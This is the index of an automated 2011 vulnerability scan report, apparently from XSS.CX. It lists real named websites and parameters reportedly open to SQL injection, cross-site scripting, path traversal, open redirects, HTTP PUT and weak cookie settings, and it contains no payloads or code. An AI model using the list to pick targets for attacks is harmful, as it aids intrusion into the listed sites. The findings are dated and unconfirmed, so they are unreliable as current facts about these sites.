DORK Report for May 2, 2011, Vulnerable Hosts, GHDB, XSS, SQL Injection, HTTP PUT

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon May 02 10:53:10 CDT 2011.



1. SQL injection

1.1. http://ads2.adbrite.com/v0/ad [zs parameter]

1.2. http://bizinformation.co/www.onlinemicrofiche.com [REST URL parameter 1]

1.3. http://bizinformation.co/www.onlinemicrofiche.com [name of an arbitrarily supplied request parameter]

1.4. http://bizinformation.com/favicon.ico [REST URL parameter 1]

1.5. http://bizinformation.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.6. http://bizinformation.com/images/fl/0.gif [REST URL parameter 1]

1.7. http://bizinformation.com/images/fl/0.gif [REST URL parameter 2]

1.8. http://bizinformation.com/images/fl/0.gif [REST URL parameter 3]

1.9. http://bizinformation.com/images/fl/0.gif [name of an arbitrarily supplied request parameter]

1.10. http://googleads.g.doubleclick.net/pagead/ads [p parameter]

1.11. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]

1.12. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]

1.13. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

1.14. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

1.15. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]

1.16. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]

1.17. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]

1.18. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]

1.19. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]

1.20. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]

1.21. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]

1.22. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]

1.23. http://www.japanator.com/favicon.ico [REST URL parameter 1]

1.24. http://www.n1-models.com/favicon.ico [User-Agent HTTP header]

1.25. http://www.ourprayer.org/favicon.ico [User-Agent HTTP header]

1.26. http://www.ourprayer.org/favicon.ico [name of an arbitrarily supplied request parameter]

1.27. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

1.28. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

1.29. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

1.30. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

1.31. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

1.32. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

1.33. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

1.34. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

1.35. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

1.36. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

1.37. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

1.38. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

1.39. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

1.40. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

1.41. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

1.42. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

1.43. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

1.44. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

1.45. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

1.46. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

2. ASP.NET tracing enabled

3. File path traversal

3.1. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

3.2. http://www.ibegin.com/weather/weather_widget.php [city parameter]

3.3. http://www.ibegin.com/weather/weather_widget.php [country parameter]

3.4. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

3.5. http://www.ibegin.com/weather/weather_widget.php [state parameter]

3.6. http://www.ibegin.com/weather/weather_widget.php [type parameter]

4. LDAP injection

4.1. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

4.2. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_search_box.js [REST URL parameter 1]

4.3. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnavLogo.js [REST URL parameter 1]

5. HTTP PUT enabled

5.1. http://www.onlinemicrofiche.com/favicon.ico

5.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

6. HTTP header injection

6.1. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16 [REST URL parameter 1]

6.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [REST URL parameter 1]

6.3. http://ad.doubleclick.net/adj/wpni.jobs/front [REST URL parameter 1]

6.4. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 2]

6.5. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 4]

6.6. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 5]

7. Cross-site scripting (reflected)

7.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [adurl parameter]

7.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [ai parameter]

7.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [client parameter]

7.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [num parameter]

7.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sig parameter]

7.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sz parameter]

7.7. http://ad.doubleclick.net/adj/wpni.jobs/front [sz parameter]

7.8. http://ad.turn.com/server/pixel.htm [fpid parameter]

7.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

7.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]

7.11. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

7.12. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

7.13. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

7.14. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]

7.15. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]

7.16. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

7.17. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

7.18. http://ads.adbrite.com/adserver/vdi/806205 [REST URL parameter 3]

7.19. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]

7.20. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

7.21. http://digg.com/tools/diggthis.js [REST URL parameter 1]

7.22. http://digg.com/tools/diggthis.js [REST URL parameter 2]

7.23. http://guru.sitescout.com/tag.jsp [h parameter]

7.24. http://guru.sitescout.com/tag.jsp [pid parameter]

7.25. http://guru.sitescout.com/tag.jsp [w parameter]

7.26. http://hit.blvdstatus.com/t [tid parameter]

7.27. http://insurancenewsnet.com/article.aspx [_TSM_HiddenField_ parameter]

7.28. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

7.29. http://r.turn.com/server/pixel.htm [fpid parameter]

7.30. http://r.turn.com/server/pixel.htm [sp parameter]

7.31. http://s28.sitemeter.com/js/counter.asp [site parameter]

7.32. http://s28.sitemeter.com/js/counter.js [site parameter]

7.33. http://tomopop.com/index-ad-anime.phtml [REST URL parameter 1]

7.34. http://track.blvdstatus.com/js/track.php [name of an arbitrarily supplied request parameter]

7.35. http://track.blvdstatus.com/js/track.php [tid parameter]

7.36. http://usjobsresource.com/3 [s parameter]

7.37. http://usjobsresource.com/3/ [s parameter]

7.38. http://widgets.digg.com/buttons/count [url parameter]

7.39. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [GUID parameter]

7.40. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.41. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.42. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.43. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [WT.srch parameter]

7.44. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [name of an arbitrarily supplied request parameter]

7.45. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

7.46. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

7.47. http://www.ibegin.com/weather/weather_widget.php [border_color parameter]

7.48. http://www.ibegin.com/weather/weather_widget.php [border_width parameter]

7.49. http://www.ibegin.com/weather/weather_widget.php [city parameter]

7.50. http://www.ibegin.com/weather/weather_widget.php [color parameter]

7.51. http://www.ibegin.com/weather/weather_widget.php [country parameter]

7.52. http://www.ibegin.com/weather/weather_widget.php [current parameter]

7.53. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

7.54. http://www.ibegin.com/weather/weather_widget.php [font_size parameter]

7.55. http://www.ibegin.com/weather/weather_widget.php [forecast parameter]

7.56. http://www.ibegin.com/weather/weather_widget.php [padding parameter]

7.57. http://www.ibegin.com/weather/weather_widget.php [showicons parameter]

7.58. http://www.ibegin.com/weather/weather_widget.php [smallicon parameter]

7.59. http://www.ibegin.com/weather/weather_widget.php [state parameter]

7.60. http://www.ibegin.com/weather/weather_widget.php [type parameter]

7.61. http://www.ibegin.com/weather/weather_widget.php [width parameter]

7.62. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]

7.63. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]

7.64. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

7.65. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

7.66. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

7.67. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

7.68. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]

7.69. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]

7.70. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]

7.71. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]

7.72. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]

7.73. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]

7.74. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]

7.75. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]

7.76. http://www.japanator.com/favicon.ico [REST URL parameter 1]

7.77. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.78. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.79. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.80. http://www.lenox.com/favicon.ico [REST URL parameter 1]

7.81. http://www.lenox.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.82. http://www.mygiftcardsite.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.83. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.84. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.85. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.86. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.87. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.88. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.89. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.90. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.91. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.92. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.93. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.94. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.95. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.96. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.97. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.98. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.99. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.100. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.101. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.102. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.103. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.104. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.105. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.106. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.107. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.108. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.109. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.110. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.111. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.112. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.113. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.114. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.115. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.116. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.117. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.118. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.119. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.120. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.121. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.122. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.123. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.124. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.125. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.126. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.127. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.128. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.129. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.130. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.131. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.132. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.133. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.134. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.135. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.136. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.137. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.138. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.139. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.140. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.141. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.142. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.143. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com [REST URL parameter 2]

7.144. http://bdv.bidvertiser.com/BidVertiser.dbm [Referer HTTP header]

7.145. http://s28.sitemeter.com/js/counter.asp [IP cookie]

7.146. http://s28.sitemeter.com/js/counter.js [IP cookie]

7.147. http://www.a-m-7.com/favicon.ico [REST URL parameter 1]

7.148. http://www.a-m-7.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.149. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.150. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.151. http://www.upmc.edu/favicon.ico [name of an arbitrarily supplied request parameter]

8. Flash cross-domain policy

8.1. http://0.gravatar.com/crossdomain.xml

8.2. http://1.gravatar.com/crossdomain.xml

8.3. http://ad.doubleclick.net/crossdomain.xml

8.4. http://ad.turn.com/crossdomain.xml

8.5. http://admeld.adnxs.com/crossdomain.xml

8.6. http://admonkey.dapper.net/crossdomain.xml

8.7. http://ajax.googleapis.com/crossdomain.xml

8.8. http://b.scorecardresearch.com/crossdomain.xml

8.9. http://bh.contextweb.com/crossdomain.xml

8.10. http://bs.serving-sys.com/crossdomain.xml

8.11. http://c.atdmt.com/crossdomain.xml

8.12. http://cdn.turn.com/crossdomain.xml

8.13. http://d1.openx.org/crossdomain.xml

8.14. http://dg.specificclick.net/crossdomain.xml

8.15. http://ds.serving-sys.com/crossdomain.xml

8.16. http://edge.aperture.displaymarketplace.com/crossdomain.xml

8.17. http://ib.adnxs.com/crossdomain.xml

8.18. http://l.yimg.com/crossdomain.xml

8.19. http://loadm.exelator.com/crossdomain.xml

8.20. http://loadus.exelator.com/crossdomain.xml

8.21. http://log30.doubleverify.com/crossdomain.xml

8.22. http://map.media6degrees.com/crossdomain.xml

8.23. http://metrics.washingtonpost.com/crossdomain.xml

8.24. http://n4403ad.doubleclick.net/crossdomain.xml

8.25. http://pix01.revsci.net/crossdomain.xml

8.26. http://pixel.invitemedia.com/crossdomain.xml

8.27. http://pixel.quantserve.com/crossdomain.xml

8.28. http://r.turn.com/crossdomain.xml

8.29. http://resources.infolinks.com/crossdomain.xml

8.30. http://s0.2mdn.net/crossdomain.xml

8.31. http://segment-pixel.invitemedia.com/crossdomain.xml

8.32. http://t.mookie1.com/crossdomain.xml

8.33. http://tags.bluekai.com/crossdomain.xml

8.34. http://usjobsresource.com/crossdomain.xml

8.35. http://va.px.invitemedia.com/crossdomain.xml

8.36. http://view.atdmt.com/crossdomain.xml

8.37. http://www.4tubehd.com/crossdomain.xml

8.38. http://www.aces.edu/crossdomain.xml

8.39. http://www.architecturaldigest.com/crossdomain.xml

8.40. http://www.babesandstars.com/crossdomain.xml

8.41. http://www.bakugandimensions.com/crossdomain.xml

8.42. http://www.banner.kiev.ua/crossdomain.xml

8.43. http://www.bigrebelgames.com/crossdomain.xml

8.44. http://www.bonhams.com/crossdomain.xml

8.45. http://www.cbs8.com/crossdomain.xml

8.46. http://www.express.co.uk/crossdomain.xml

8.47. http://www.foxytube.com/crossdomain.xml

8.48. http://www.freemooviesonline.com/crossdomain.xml

8.49. http://www.fulltiltpoker.net/crossdomain.xml

8.50. http://www.goodtoknow.co.uk/crossdomain.xml

8.51. http://www.healthination.com/crossdomain.xml

8.52. http://www.hyperlaunch.com/crossdomain.xml

8.53. http://www.jacksonnewspapers.com/crossdomain.xml

8.54. http://www.journalstandard.com/crossdomain.xml

8.55. http://www.ksrevenue.org/crossdomain.xml

8.56. http://www.mountaindew.com/crossdomain.xml

8.57. http://www.muschealth.com/crossdomain.xml

8.58. http://www.outdoorjp.com/crossdomain.xml

8.59. http://www.partyamerica.com/crossdomain.xml

8.60. http://www.pisamba.com/crossdomain.xml

8.61. http://www.thebeatles.com/crossdomain.xml

8.62. http://www.thefordstory.com/crossdomain.xml

8.63. http://www.thehothits.com/crossdomain.xml

8.64. http://www.trilulilu.ro/crossdomain.xml

8.65. http://www.tutorialized.com/crossdomain.xml

8.66. http://www.virtual-hairstyles.com/crossdomain.xml

8.67. http://www.weddings.com/crossdomain.xml

8.68. http://www.wmms.com/crossdomain.xml

8.69. http://www.wsfa.com/crossdomain.xml

8.70. http://www.wtoc.com/crossdomain.xml

8.71. http://adadvisor.net/crossdomain.xml

8.72. http://ads-vrx.adbrite.com/crossdomain.xml

8.73. http://ads.adbrite.com/crossdomain.xml

8.74. http://ads2.adbrite.com/crossdomain.xml

8.75. http://adx.g.doubleclick.net/crossdomain.xml

8.76. http://cookex.amp.yahoo.com/crossdomain.xml

8.77. http://csct.att.com/crossdomain.xml

8.78. http://d.chango.com/crossdomain.xml

8.79. http://geo.yahoo.com/crossdomain.xml

8.80. http://googleads.g.doubleclick.net/crossdomain.xml

8.81. http://media.washingtonpost.com/crossdomain.xml

8.82. http://news.yahoo.com/crossdomain.xml

8.83. http://online.wsj.com/crossdomain.xml

8.84. http://pagead2.googlesyndication.com/crossdomain.xml

8.85. http://pubads.g.doubleclick.net/crossdomain.xml

8.86. http://s28.sitemeter.com/crossdomain.xml

8.87. http://static.ak.facebook.com/crossdomain.xml

8.88. http://tomopop.com/crossdomain.xml

8.89. http://www.admez.com/crossdomain.xml

8.90. http://www.anilinkz.com/crossdomain.xml

8.91. http://www.awltovhc.com/crossdomain.xml

8.92. http://www.bingo.com/crossdomain.xml

8.93. http://www.chrisbrownworld.com/crossdomain.xml

8.94. http://www.cosmeticscop.com/crossdomain.xml

8.95. http://www.dotmed.com/crossdomain.xml

8.96. http://www.facebook.com/crossdomain.xml

8.97. http://www.ftjcfx.com/crossdomain.xml

8.98. http://www.kens5.com/crossdomain.xml

8.99. http://www.lavalife.com/crossdomain.xml

8.100. http://www.lduhtrp.net/crossdomain.xml

8.101. http://www.mihomepaper.com/crossdomain.xml

8.102. http://www.mynews.in/crossdomain.xml

8.103. http://www.nextworth.com/crossdomain.xml

8.104. http://www.swarminteractive.com/crossdomain.xml

8.105. http://www.toyotacertified.com/crossdomain.xml

8.106. http://www.tqlkg.com/crossdomain.xml

8.107. http://www.villagehatshop.com/crossdomain.xml

8.108. http://www.washingtonpost.com/crossdomain.xml

8.109. http://www.whymilk.com/crossdomain.xml

8.110. http://www.wpsdlocal6.com/crossdomain.xml

8.111. http://www.wretch.cc/crossdomain.xml

8.112. http://www.youneek.com/crossdomain.xml

8.113. http://www.argosy.edu/crossdomain.xml

8.114. http://www.babybottlepop.com/crossdomain.xml

8.115. http://www.bluesplayer.co.uk/crossdomain.xml

8.116. http://www.hotwheelscollectors.com/crossdomain.xml

8.117. http://www.mdconsult.com/crossdomain.xml

8.118. http://www.oshkoshbgosh.com/crossdomain.xml

8.119. http://www.ourmidland.com/crossdomain.xml

8.120. http://www.recordslogin.com/crossdomain.xml

8.121. http://www.reelseo.com/crossdomain.xml

8.122. http://www.slotocash.com/crossdomain.xml

8.123. http://www.solidworks.com/crossdomain.xml

8.124. http://www.undisciplined-subs.com/crossdomain.xml

8.125. http://www.uni.edu/crossdomain.xml

8.126. http://www.voiceofsandiego.org/crossdomain.xml

8.127. http://www.walthers.com/crossdomain.xml

9. Silverlight cross-domain policy

9.1. http://ad.doubleclick.net/clientaccesspolicy.xml

9.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

9.3. http://metrics.washingtonpost.com/clientaccesspolicy.xml

9.4. http://n4403ad.doubleclick.net/clientaccesspolicy.xml

9.5. http://s0.2mdn.net/clientaccesspolicy.xml

9.6. http://view.atdmt.com/clientaccesspolicy.xml

10. Cleartext submission of password

10.1. http://insurancenewsnet.com/article.aspx

10.2. http://www.greenhulk.net/forums/login.php

10.3. http://www.greenhulk.net/forums/login.php

10.4. http://www.greenhulk.net/forums/register.php

10.5. http://www.greenhulk.net/forums/register.php

10.6. http://www.greenhulk.net/forums/showthread.php

10.7. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

10.8. http://www.japanator.com/elephant/login.phtml

10.9. http://www.japanator.com/elephant/signup.phtml

10.10. http://www.mrsdash.com/favicon.ico

11. XML injection

11.1. http://loadm.exelator.com/load/ [REST URL parameter 1]

11.2. http://loadus.exelator.com/load/ [REST URL parameter 1]

11.3. http://loadus.exelator.com/load/net.php [REST URL parameter 1]

11.4. http://loadus.exelator.com/load/net.php [REST URL parameter 2]

11.5. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794 [F cookie]

11.6. http://translate.googleapis.com/translate_a/l [cb parameter]

11.7. http://www.binsearch.info/favicon.ico [REST URL parameter 1]

11.8. http://www.hairyforever.com/favicon.ico [REST URL parameter 1]

11.9. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 1]

11.10. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 2]

11.11. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 3]

11.12. http://www.mangastream.com/favicon.ico [REST URL parameter 1]

11.13. http://www.masalaboard.com/favicon.ico [REST URL parameter 1]

11.14. http://www.myp2p.eu/favicon.ico [REST URL parameter 1]

11.15. http://www.oxfamamerica.org/favicon.ico [REST URL parameter 1]

11.16. http://www.yardmalls.com/favicon.ico [REST URL parameter 1]

12. SSL cookie without secure flag set

12.1. https://www.crankyape.com/member/registration.aspx

12.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

12.3. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

13. Session token in URL

14. Password field submitted using GET method

15. Open redirection

15.1. http://0.gravatar.com/avatar/8ce02a29142905cdfb140added296ef8 [d parameter]

15.2. http://0.gravatar.com/avatar/a76bb4a499349279e0339b78885213c6 [d parameter]

15.3. http://1.gravatar.com/avatar/31345061262d8fde4fa5256164900115 [d parameter]

15.4. http://admonkey.dapper.net/AdBriteUIDMonster [redirect parameter]

15.5. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

15.6. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]

15.7. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]

15.8. http://bh.contextweb.com/bh/rtset [rurl parameter]

15.9. http://pixel.rubiconproject.com/tap.php [next parameter]

15.10. http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif [&redirect parameter]

15.11. http://sync.mathtag.com/sync/img [redir parameter]

16. Cookie scoped to parent domain

16.1. http://t.mookie1.com/t/v1/event

16.2. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/

16.3. http://www.greenhulk.net/forums/archive/index.php/t-126285.html

16.4. http://www.mylearningplan.com/favicon.ico

16.5. http://www.ptcb.org/favicon.ico

16.6. http://www.washingtonpost.com/wl/jobs/home

16.7. http://0.r.msn.com/

16.8. http://a.triggit.com/px

16.9. http://ab-m.d.chango.com/m/ab

16.10. http://ad.turn.com/server/pixel.htm

16.11. http://admeld.adnxs.com/usersync

16.12. http://ads.adbrite.com/adserver/behavioral-data/8201

16.13. http://ads.adbrite.com/adserver/behavioral-data/8204

16.14. http://ads.adbrite.com/adserver/vdi/682865

16.15. http://ads.adbrite.com/adserver/vdi/682865

16.16. http://ads.adbrite.com/adserver/vdi/684339

16.17. http://ads.adbrite.com/adserver/vdi/711384

16.18. http://ads.adbrite.com/adserver/vdi/762701

16.19. http://ads.adbrite.com/adserver/vdi/779045

16.20. http://ads.adbrite.com/adserver/vdi/806205

16.21. http://ads2.adbrite.com/v0/ad

16.22. http://ads2.adbrite.com/v0/ad

16.23. http://ads2.adbrite.com/v0/ad

16.24. http://b.scorecardresearch.com/b

16.25. http://bdv.bidvertiser.com/bidvertiser.dbm

16.26. http://bh.contextweb.com/bh/rtset

16.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.28. http://c.bing.com/c.gif

16.29. http://c.statcounter.com/t.php

16.30. http://clk.atdmt.com/CNT/go/319741851/direct/01/

16.31. http://csc.beap.ad.yieldmanager.net/i

16.32. http://ib.adnxs.com/getuid

16.33. http://image2.pubmatic.com/AdServer/Pug

16.34. http://loadm.exelator.com/load/

16.35. http://loadus.exelator.com/load/

16.36. http://map.media6degrees.com/orbserv/hbpix

16.37. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

16.38. http://pix01.revsci.net/J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif

16.39. http://pixel.invitemedia.com/data_sync

16.40. http://pixel.quantserve.com/pixel

16.41. http://pixel.rubiconproject.com/tap.php

16.42. http://r.turn.com/server/pixel.htm

16.43. http://segment-pixel.invitemedia.com/set_partner_uid

16.44. http://sync.mathtag.com/sync/img

16.45. http://tags.bluekai.com/site/2831

16.46. http://tags.bluekai.com/site/2893

16.47. http://tags.bluekai.com/site/3754

16.48. http://tags.bluekai.com/site/3945

16.49. http://um.simpli.fi/ab_match

16.50. http://user.lucidmedia.com/clicksense/user

16.51. http://va.px.invitemedia.com/goog_imp

16.52. http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

16.53. http://www.bing.com/

16.54. http://www.bing.com/HPImageArchive.aspx

16.55. http://www.bing.com/fd/fb/r

16.56. http://www.bing.com/fd/fb/u

16.57. http://www.bing.com/fd/ls/l

16.58. http://www.bing.com/scopePopupHandler.aspx

16.59. http://www.dirtrider.com/favicon.ico

16.60. http://www.greenhulk.net/forums/login.php

16.61. http://www.greenhulk.net/forums/register.php

16.62. http://www.kylotteryretailers.com/favicon.ico

16.63. http://www.schwabbankcreditcard.com/favicon.ico

17. Cookie without HttpOnly flag set

17.1. http://dg.specificclick.net/

17.2. http://t.mookie1.com/t/v1/event

17.3. http://www.92kqrs.com/favicon.ico

